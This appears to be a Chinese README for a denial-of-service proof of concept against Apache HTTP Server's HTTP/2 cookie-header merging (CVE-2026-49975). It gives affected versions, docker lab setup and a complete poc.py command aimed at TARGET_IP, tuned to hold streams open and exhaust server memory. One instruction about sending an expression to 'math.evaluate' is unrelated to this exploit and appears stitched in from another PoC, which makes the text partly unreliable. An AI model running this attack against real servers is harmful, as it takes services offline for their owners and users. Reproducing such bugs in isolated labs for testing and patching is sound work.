★ CVE-2026-49975 HTTP/2 Bomb PoC ★
CVE-2026-49975 是 Apache HTTP Server 中的一个**拒绝服务(DoS)**漏洞。 该漏洞出现在 HTTP/2 请求处理路径中,多个
cookie头字段可以在不经过LimitRequestFields正确计数的情况下合并。 通过发送一个小的 HPACK 编码的 HTTP/2 请求,该请求扩展成多个cookie头字段,攻击者可以强制服务器在 Cookie 头合并过程中反复分配内存。 攻击者随后可利用 HTTP/2 流控制延迟响应传输,使受影响的流保持打开状态,阻止已分配的内存被释放。
| 类别 | 版本 |
|---|---|
| 受影响 | Apache HTTP Server 2.4.17 ≤ 版本 ≤ 2.4.67 |
| 已修复 | Apache HTTP Server 2.4.68 或更高版本 |
构建并运行存在漏洞的 Apache HTTP Server 环境。
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
启动漏洞环境后,按照以下步骤重现攻击。
docker stats cve-2026-49975
示例输出:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
将以下表达式发送给 math.evaluate(例如,通过应用程序的计算输入)。
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
检查 Apache 容器的内存使用量是否增加并在攻击流保持打开期间保持高位。